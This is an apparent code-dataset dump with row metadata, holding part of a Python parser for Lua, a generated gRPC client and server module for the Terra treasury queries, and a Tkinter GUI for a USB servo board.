self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.DoStat(block)
def parse_while_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE)
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.WhileStat(exp, block)
def parse_repeat_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL)
exp = self.parse_exp(0)[1]
return ast.RepeatStat(exp, block)
def parse_if_stat(self):
exp_list = []
block_list = []
self.lex.next_token_of_kind(lexer.TokenKind.KW_IF)
exp = self.parse_exp(0)[1]
exp_list.append(exp)
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block = self.parse_block()
block_list.append(block)
while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF)
exp_list.append(self.parse_exp(0)[1])
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block_list.append(self.parse_block())
if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE)
exp_list.append(ast.BoolConstExp(True))
block_list.append(self.parse_block())
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.IfStat(exp_list, block_list)
def parse_for_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR)
name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
return self.finish_for_num_stat(name)
else:
return self.finish_for_in_stat(name)
def finish_for_num_stat(self, var):
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
init_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA)
limit_exp = self.parse_exp(0)[1]
step_exp = None
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
step_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block)
def finish_for_in_stat(self, name):
var_list = self.parse_name_list(name)
self.lex.next_token_of_kind(lexer.TokenKind.KW_IN)
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForInStat(var_list, exp_list, block)
def parse_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_name_exp, has_colon = self.parse_func_name_exp()
func_body_exp = self.parse_func_body_exp(has_colon)
return ast.AssignStat([func_name_exp], [func_body_exp])
# parlist ::= namelist [‘,’ ‘...’] | ‘...’
# namelist ::= Name {‘,’ Name}
def parse_parlist(self):
parlist = []
is_var_arg = False
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN:
return parlist, is_var_arg
if self.lex.look_ahead().kind == lexer.TokenKind.VARARG:
is_var_arg = True
self.lex.next_token()
return parlist, is_var_arg
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER:
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
else:
self.lex.next_token_of_kind(lexer.TokenKind.VARARG)
is_var_arg = True
break
return parlist, is_var_arg
# funcbody ::= ‘(’ [parlist] ‘)’ block end
def parse_func_body_exp(self, has_colon):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN)
parlist, is_var_arg = self.parse_parlist()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
if has_colon:
parlist.insert(0, ast.StringExp('self'))
body = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.FunctionDefExp(parlist, is_var_arg, body)
# funcname ::= Name {‘.’ Name} [‘:’ Name]
def parse_func_name_exp(self):
has_colon = False
name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
has_colon = True
return name_exp, has_colon
def parse_local_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_local_func_def_stat()
else:
return self.parse_local_var_decl_stat()
# namelist ::= Name {‘,’ Name}
def parse_name_list(self, name=None):
if name:
var_list = [name]
else:
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
return var_list
# local function Name funcbody
def parse_local_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
exp_list = [self.parse_func_body_exp(False)]
return ast.LocalDeclStat(var_list, exp_list)
# local namelist [‘=’ explist]
def parse_local_var_decl_stat(self):
var_list = self.parse_name_list()
exp_list = []
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.LocalDeclStat(var_list, exp_list)
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
# functioncall ::= prefixexp args | prefixexp ‘:’ Name args
# prefixexp ::= var | functioncall | ‘(’ exp ‘)’
# prefixexp ::= prefixexp args
# | prefixexp ‘:’ Name args
# | prefixexp ‘[’ exp ‘]’
# | prefixexp ‘.’ Name
# | ‘(’ exp ‘)’
# | Name
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_prefix_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
else:
name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
exp = ast.NameExp(name.data)
while True:
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
elif look_token.kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
args_exp = [exp]
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
args_exp.extend(self.parse_func_args())
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]:
args_exp = self.parse_func_args()
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
idx_exp = self.parse_exp(0)[1]
exp = ast.TableAccessExp(exp, idx_exp)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
else:
break
return exp
# varlist ‘=’ explist
# functioncall
def parse_assign_or_func_call_stat(self):
exp = self.parse_prefix_exp()
look_token = self.lex.look_ahead()
if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]:
return self.finsh_assign_stat(exp)
elif isinstance(exp, ast.FunctionCallExp):
return exp
else:
raise Exception("syntax error near '%s'" % look_token)
def check_var(self, exp):
if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp):
return exp
raise Exception("syntax error near '%s'" % token)
# varlist ‘=’ explist
# varlist ::= var {‘,’ var}
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
def finsh_assign_stat(self, first_var):
var_list = [first_var]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(self.check_var(self.parse_prefix_exp()))
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.AssignStat(var_list, exp_list)
"""
stat ::= ‘;’ |
break |
::Name:: |
goto Name |
do block end |
while exp do block end |
repeat block until exp |
if exp then block {elseif exp then block} [else block] end |
for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end |
for namelist in explist do block end |
function funcname funcbody |
local function Name funcbody |
local namelist [‘=’ explist]
varlist ‘=’ explist |
functioncall
"""
def parse_stat(self):
token = self.lex.look_ahead()
if token.kind == lexer.TokenKind.SEP_SEMI:
return self.parse_empty_stat()
elif token.kind == lexer.TokenKind.KW_BREAK:
return self.parse_break_stat()
elif token.kind == lexer.TokenKind.SEP_LABEL:
return self.parse_label_stat()
elif token.kind == lexer.TokenKind.KW_GOTO:
return self.parse_goto_stat()
elif token.kind == lexer.TokenKind.KW_DO:
return self.parse_do_stat()
elif token.kind == lexer.TokenKind.KW_WHILE:
return self.parse_while_stat()
elif token.kind == lexer.TokenKind.KW_REPEAT:
return self.parse_repeat_stat()
elif token.kind == lexer.TokenKind.KW_IF:
return self.parse_if_stat()
elif token.kind == lexer.TokenKind.KW_FOR:
return self.parse_for_stat()
elif token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_stat()
elif token.kind == lexer.TokenKind.KW_LOCAL:
return self.parse_local_def_stat()
else:
return self.parse_assign_or_func_call_stat()
def parse_empty_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI)
def parse_break_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK)
return ast.BreakStat()
def parse_label_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
return ast.LabelStat(label)
def parse_stats(self):
stats = []
while not self.is_block_end(self.lex.look_ahead().kind):
stat = self.parse_stat()
if stat:
stats.append(stat)
return stats
def is_block_end(self, kind):
if kind in self.block_end_tokens:
return True
return False | 42.894027 | 128 | 0.620519 | 22,448 | 0.998843 | 0 | 0 | 0 | 0 | 0 | 0 | 2,670 | 0.118804 |
73127b6e66f9e5e908a0672dbaeb988571d8cf2c | 14,720 | py | Python | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: terra/treasury/v1beta1/genesis.proto, terra/treasury/v1beta1/query.proto, terra/treasury/v1beta1/treasury.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import Dict, List
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
@dataclass(eq=False, repr=False)
class Params(betterproto.Message):
"""Params defines the parameters for the oracle module."""
tax_policy: "PolicyConstraints" = betterproto.message_field(1)
reward_policy: "PolicyConstraints" = betterproto.message_field(2)
seigniorage_burden_target: str = betterproto.string_field(3)
mining_increment: str = betterproto.string_field(4)
window_short: int = betterproto.uint64_field(5)
window_long: int = betterproto.uint64_field(6)
window_probation: int = betterproto.uint64_field(7)
@dataclass(eq=False, repr=False)
class PolicyConstraints(betterproto.Message):
"""
    PolicyConstraints defines the policy constraints that can be applied in tax
    & reward policies
"""
rate_min: str = betterproto.string_field(1)
rate_max: str = betterproto.string_field(2)
cap: "___cosmos_base_v1_beta1__.Coin" = betterproto.message_field(3)
change_rate_max: str = betterproto.string_field(4)
@dataclass(eq=False, repr=False)
class EpochTaxProceeds(betterproto.Message):
"""
EpochTaxProceeds represents the tax amount collected at the current epoch
"""
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class EpochInitialIssuance(betterproto.Message):
"""
    EpochInitialIssuance represents initial issuance of the current epoch
"""
issuance: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxRateRequest(betterproto.Message):
"""
QueryTaxRateRequest is the request type for the Query/TaxRate RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxRateResponse(betterproto.Message):
"""
QueryTaxRateResponse is response type for the Query/TaxRate RPC method.
"""
tax_rate: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapRequest(betterproto.Message):
"""
QueryTaxCapRequest is the request type for the Query/TaxCap RPC method.
"""
# denom defines the denomination to query for.
denom: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapResponse(betterproto.Message):
"""
QueryTaxCapResponse is response type for the Query/TaxCap RPC method.
"""
tax_cap: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapsRequest(betterproto.Message):
"""
QueryTaxCapsRequest is the request type for the Query/TaxCaps RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxCapsResponseItem(betterproto.Message):
"""
QueryTaxCapsResponseItem is response item type for the Query/TaxCaps RPC
method.
"""
denom: str = betterproto.string_field(1)
tax_cap: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class QueryTaxCapsResponse(betterproto.Message):
"""
QueryTaxCapsResponse is response type for the Query/TaxCaps RPC method.
"""
tax_caps: List["QueryTaxCapsResponseItem"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QueryRewardWeightRequest(betterproto.Message):
"""
QueryRewardWeightRequest is the request type for the Query/RewardWeight RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryRewardWeightResponse(betterproto.Message):
"""
QueryRewardWeightResponse is response type for the Query/RewardWeight RPC
method.
"""
reward_weight: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxProceedsRequest(betterproto.Message):
"""
QueryTaxProceedsRequest is the request type for the Query/TaxProceeds RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxProceedsResponse(betterproto.Message):
"""
QueryTaxProceedsResponse is response type for the Query/TaxProceeds RPC
method.
"""
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QuerySeigniorageProceedsRequest(betterproto.Message):
"""
QuerySeigniorageProceedsRequest is the request type for the
Query/SeigniorageProceeds RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QuerySeigniorageProceedsResponse(betterproto.Message):
"""
QuerySeigniorageProceedsResponse is response type for the
Query/SeigniorageProceeds RPC method.
"""
seigniorage_proceeds: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryIndicatorsRequest(betterproto.Message):
"""
QueryIndicatorsRequest is the request type for the Query/Indicators RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryIndicatorsResponse(betterproto.Message):
"""
QueryIndicatorsResponse is response type for the Query/Indicators RPC
method.
"""
trl_year: str = betterproto.string_field(1)
trl_month: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class QueryParamsRequest(betterproto.Message):
"""
QueryParamsRequest is the request type for the Query/Params RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryParamsResponse(betterproto.Message):
"""
QueryParamsResponse is the response type for the Query/Params RPC method.
"""
# params defines the parameters of the module.
params: "Params" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GenesisState(betterproto.Message):
"""GenesisState defines the oracle module's genesis state."""
params: "Params" = betterproto.message_field(1)
tax_rate: str = betterproto.string_field(2)
reward_weight: str = betterproto.string_field(3)
tax_caps: List["TaxCap"] = betterproto.message_field(4)
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(5)
epoch_initial_issuance: List[
"___cosmos_base_v1_beta1__.Coin"
] = betterproto.message_field(6)
epoch_states: List["EpochState"] = betterproto.message_field(7)
@dataclass(eq=False, repr=False)
class TaxCap(betterproto.Message):
"""TaxCap is the max tax amount can be charged for the given denom"""
denom: str = betterproto.string_field(1)
tax_cap: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class EpochState(betterproto.Message):
"""EpochState is the record for each epoch state"""
epoch: int = betterproto.uint64_field(1)
tax_reward: str = betterproto.string_field(2)
seigniorage_reward: str = betterproto.string_field(3)
total_staked_luna: str = betterproto.string_field(4)
class QueryStub(betterproto.ServiceStub):
async def tax_rate(self) -> "QueryTaxRateResponse":
request = QueryTaxRateRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxRate", request, QueryTaxRateResponse
)
async def tax_cap(self, *, denom: str = "") -> "QueryTaxCapResponse":
request = QueryTaxCapRequest()
request.denom = denom
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxCap", request, QueryTaxCapResponse
)
async def tax_caps(self) -> "QueryTaxCapsResponse":
request = QueryTaxCapsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxCaps", request, QueryTaxCapsResponse
)
async def reward_weight(self) -> "QueryRewardWeightResponse":
request = QueryRewardWeightRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/RewardWeight",
request,
QueryRewardWeightResponse,
)
async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse":
request = QuerySeigniorageProceedsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/SeigniorageProceeds",
request,
QuerySeigniorageProceedsResponse,
)
async def tax_proceeds(self) -> "QueryTaxProceedsResponse":
request = QueryTaxProceedsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxProceeds",
request,
QueryTaxProceedsResponse,
)
async def indicators(self) -> "QueryIndicatorsResponse":
request = QueryIndicatorsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/Indicators", request, QueryIndicatorsResponse
)
async def params(self) -> "QueryParamsResponse":
request = QueryParamsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/Params", request, QueryParamsResponse
)
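

# A minimal async client sketch (the host/port and channel handling here are
# illustrative assumptions, not part of this generated module):
#
#   from grpclib.client import Channel
#
#   async def fetch_tax_rate() -> str:
#       channel = Channel(host="localhost", port=9090)
#       try:
#           resp = await QueryStub(channel).tax_rate()
#           return resp.tax_rate
#       finally:
#           channel.close()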
class QueryBase(ServiceBase):
async def tax_rate(self) -> "QueryTaxRateResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_cap(self, denom: str) -> "QueryTaxCapResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_caps(self) -> "QueryTaxCapsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def reward_weight(self) -> "QueryRewardWeightResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_proceeds(self) -> "QueryTaxProceedsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def indicators(self) -> "QueryIndicatorsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def params(self) -> "QueryParamsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_tax_rate(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_rate(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_cap(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"denom": request.denom,
}
response = await self.tax_cap(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_caps(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_caps(**request_kwargs)
await stream.send_message(response)
async def __rpc_reward_weight(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.reward_weight(**request_kwargs)
await stream.send_message(response)
async def __rpc_seigniorage_proceeds(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.seigniorage_proceeds(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_proceeds(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_proceeds(**request_kwargs)
await stream.send_message(response)
async def __rpc_indicators(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.indicators(**request_kwargs)
await stream.send_message(response)
async def __rpc_params(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.params(**request_kwargs)
await stream.send_message(response)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/terra.treasury.v1beta1.Query/TaxRate": grpclib.const.Handler(
self.__rpc_tax_rate,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxRateRequest,
QueryTaxRateResponse,
),
"/terra.treasury.v1beta1.Query/TaxCap": grpclib.const.Handler(
self.__rpc_tax_cap,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxCapRequest,
QueryTaxCapResponse,
),
"/terra.treasury.v1beta1.Query/TaxCaps": grpclib.const.Handler(
self.__rpc_tax_caps,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxCapsRequest,
QueryTaxCapsResponse,
),
"/terra.treasury.v1beta1.Query/RewardWeight": grpclib.const.Handler(
self.__rpc_reward_weight,
grpclib.const.Cardinality.UNARY_UNARY,
QueryRewardWeightRequest,
QueryRewardWeightResponse,
),
"/terra.treasury.v1beta1.Query/SeigniorageProceeds": grpclib.const.Handler(
self.__rpc_seigniorage_proceeds,
grpclib.const.Cardinality.UNARY_UNARY,
QuerySeigniorageProceedsRequest,
QuerySeigniorageProceedsResponse,
),
"/terra.treasury.v1beta1.Query/TaxProceeds": grpclib.const.Handler(
self.__rpc_tax_proceeds,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxProceedsRequest,
QueryTaxProceedsResponse,
),
"/terra.treasury.v1beta1.Query/Indicators": grpclib.const.Handler(
self.__rpc_indicators,
grpclib.const.Cardinality.UNARY_UNARY,
QueryIndicatorsRequest,
QueryIndicatorsResponse,
),
"/terra.treasury.v1beta1.Query/Params": grpclib.const.Handler(
self.__rpc_params,
grpclib.const.Cardinality.UNARY_UNARY,
QueryParamsRequest,
QueryParamsResponse,
),
}
from ....cosmos.base import v1beta1 as ___cosmos_base_v1_beta1__
| 31.120507 | 122 | 0.691508 | 13,417 | 0.911481 | 0 | 0 | 6,648 | 0.45163 | 5,108 | 0.347011 | 3,817 | 0.259307 |
7316876aa79ec9dd6b9b2ee309c9f7ea22776613 | 5,066 | py | Python | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | #
## Copyright (c) 2018, Bradley A. Minch
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## 1. Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## 2. Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
## ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
## LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
## SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
## INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
## CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
## ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
## POSSIBILITY OF SUCH DAMAGE.
#
import Tkinter as tk
import usbservo
class usbservogui:
def __init__(self):
self.dev = usbservo.usbservo()
if self.dev.dev >= 0:
self.update_job = None
self.root = tk.Tk()
self.root.title('USB Servo GUI')
self.root.protocol('WM_DELETE_WINDOW', self.shut_down)
fm = tk.Frame(self.root)
tk.Button(fm, text = 'LED1', command = self.dev.toggle_led1).pack(side = tk.LEFT)
tk.Button(fm, text = 'LED2', command = self.dev.toggle_led2).pack(side = tk.LEFT)
tk.Button(fm, text = 'LED3', command = self.dev.toggle_led3).pack(side = tk.LEFT)
fm.pack(side = tk.TOP)
servo1_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo1_callback)
servo1_slider.set(32768)
servo1_slider.pack(side = tk.TOP)
servo2_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo2_callback)
servo2_slider.set(32768)
servo2_slider.pack(side = tk.TOP)
servo3_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo3_callback)
servo3_slider.set(32768)
servo3_slider.pack(side = tk.TOP)
servo4_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo4_callback)
servo4_slider.set(32768)
servo4_slider.pack(side = tk.TOP)
servo5_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo5_callback)
servo5_slider.set(32768)
servo5_slider.pack(side = tk.TOP)
self.sw1_status = tk.Label(self.root, text = 'SW1 is currently ?')
self.sw1_status.pack(side = tk.TOP)
self.sw2_status = tk.Label(self.root, text = 'SW2 is currently ?')
self.sw2_status.pack(side = tk.TOP)
self.sw3_status = tk.Label(self.root, text = 'SW3 is currently ?')
self.sw3_status.pack(side = tk.TOP)
self.a0_status = tk.Label(self.root, text = 'A0 is currently ????')
self.a0_status.pack(side = tk.TOP)
self.update_status()
def set_servo1_callback(self, value):
self.dev.set_servo1(int(value))
def set_servo2_callback(self, value):
self.dev.set_servo2(int(value))
def set_servo3_callback(self, value):
self.dev.set_servo3(int(value))
def set_servo4_callback(self, value):
self.dev.set_servo4(int(value))
def set_servo5_callback(self, value):
self.dev.set_servo5(int(value))
def update_status(self):
curr_a0 = self.dev.read_a0()
self.sw1_status.configure(text = 'SW1 is currently {!s}'.format(self.dev.read_sw1()))
self.sw2_status.configure(text = 'SW2 is currently {!s}'.format(self.dev.read_sw2()))
self.sw3_status.configure(text = 'SW3 is currently {!s}'.format(self.dev.read_sw3()))
if curr_a0 is not None:
self.a0_status.configure(text = 'A0 is currently {:04d}'.format(curr_a0))
self.update_job = self.root.after(50, self.update_status)
def shut_down(self):
self.root.after_cancel(self.update_job)
self.root.destroy()
self.dev.close()
if __name__=='__main__':
gui = usbservogui()
gui.root.mainloop()
| 49.666667 | 153 | 0.647059 | 3,507 | 0.692262 | 0 | 0 | 0 | 0 | 0 | 0 | 1,645 | 0.324714 |
7317deb1560647aa925ec2a580d6d0908f2796af | 155 | py | Python | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 353 | 2020-12-10T10:47:17.000Z | 2022-03-31T23:08:29.000Z | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 80 | 2020-12-10T09:54:22.000Z | 2022-03-30T22:08:45.000Z | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 63 | 2020-12-10T17:10:34.000Z | 2022-03-28T16:27:07.000Z | try:
